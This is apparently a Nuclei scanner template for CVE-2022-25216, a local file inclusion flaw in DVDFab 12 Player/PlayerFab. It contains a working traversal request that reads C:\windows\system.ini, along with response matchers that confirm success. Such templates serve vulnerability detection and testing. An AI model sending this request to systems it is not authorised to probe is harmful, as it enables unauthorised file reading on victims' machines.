nuclei-templates/cves/2022/CVE-2022-25216.yaml

38 lines
1.0 KiB
YAML

id: CVE-2022-25216
info:
name: DVDFab 12 Player/PlayerFab - Local File Inclusion
author: 0x_Akoko
severity: high
description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.
reference:
- https://www.tenable.com/security/research/tra-2022-07
- https://nvd.nist.gov/vuln/detail/CVE-2022-25216
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25216
cwe-id: CWE-22
tags: cve,cve2022,dvdFab,lfi,lfr,tenable
requests:
- method: GET
path:
- "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/06/29